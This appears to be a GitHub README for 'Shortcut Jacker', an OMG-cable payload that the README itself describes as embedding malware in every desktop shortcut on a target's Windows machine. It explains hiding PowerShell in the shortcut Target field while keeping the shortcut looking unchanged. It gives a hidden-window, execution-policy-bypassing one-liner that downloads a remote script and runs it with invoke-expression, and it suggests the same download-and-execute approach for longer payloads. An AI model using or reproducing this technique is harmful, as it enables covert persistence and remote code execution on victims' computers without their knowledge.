omg-payloads/payloads/library/execution/-OMG-ShortcutJacker
I-Am-Jakoby d8fe119ed1
Add files via upload
2022-10-10 23:35:38 -05:00
..
README.md Add files via upload 2022-10-10 23:35:38 -05:00
Shortcut-Jacker-Execute.txt Add files via upload 2022-10-10 23:35:38 -05:00
Shortcut-Jacker.ps1 Add files via upload 2022-10-10 23:35:38 -05:00

README.md

Logo

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

Shortcut Jacker

Python
YouTube Tutorial

A script used to embed malware in the shortcut on your targets desktop

Description

This payload will run a powershell script in the background of any shortcut used on the targets desktop

This is done by taking advantage of the Target field where powershell commands can be stored or run.

This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code variable and it will still run.

So if your command exceeds that consider using an IWR function to download and execute a longer script.

I have an Invoke WebRequest tutorial for that HERE

Inside the .ps1 file you will find a line at the beginning with a $code variable. This is where the powershell code you want executed is stored.



Using the Get-Shortcut function we will get the following information we can then use to maintain the integrity of the appearance of the shortcut after manipulating the Target field.

Getting Started

Once the script is executed all of the shortcuts on your target's desktop will be infected with the powershell code you have stored in the $code variable in the .ps1 file

Dependencies

  • An internet connection
  • Windows 10,11

(back to top)

Executing program

  • Plug in your device
  • Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl

(back to top)

Contributing

All contributors names will be listed here

I am Jakoby

(back to top)

Version History

  • 0.1
    • Initial Release

(back to top)

Contact

📱 My Socials 📱

C#
YouTube
Python
Twitter
Golang
Instagram
Jsonnet
Discord

(back to top)

Acknowledgments

(back to top)

Github Stats